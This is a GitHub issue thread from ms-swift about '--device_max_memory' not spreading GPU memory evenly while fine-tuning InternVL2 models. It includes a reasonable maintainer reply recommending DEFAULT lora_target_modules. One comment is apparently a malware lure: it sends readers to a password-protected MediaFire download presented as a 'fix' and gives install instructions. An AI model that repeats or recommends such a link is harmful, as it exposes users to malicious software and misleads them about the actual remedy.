### ISSUE TITLE
The setting of the "--device_max_memory" parameter seems to have no effect on the even distribution of GPU memory.

### ISSUE THREAD

**Issue by Betty-J** [modelscope/ms-swift#1830]
Hi, there
     I have noticed that even when setting --device_max_memory, an error still occurs due to the GPU memory being exceeded on a card. For example, in the following figure, I requested to fine-tune the internvl2-1B model on four GPUs, and set --device_max_memory to 22GB, 22GB, 22GB, 22GB. During training, only two GPUs are occupied by memory, and when a larger batch_size is set, it will directly report a **RuntimeError: CUDA out of memory**, while the other two cards are not used. Not only with the internvl2-1B model, but I have also observed the same phenomenon with the 2B and 4B models. Is there an issue with my configuration, Is there any way to solve this problem?
<img width="645" alt="截屏2024-08-27 14 54 58" src="https://github.com/user-attachments/assets/f984cf1e-5237-4da5-ac74-a08fe10172bd">
Here is the complete configuration for my fine-tuning process.
![截屏2024-08-27 15 00 04](https://github.com/user-attachments/assets/4a434334-686e-4ac5-83a3-d2ae5064bd06)

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tastelikefeet** [comment]
--lora_target_modules is suggested to use `DEFAULT`
ALL will add vision-tower, this may cost a lot of memory.
DEFAULT will add lora to projector and llm, this is enough in most cases
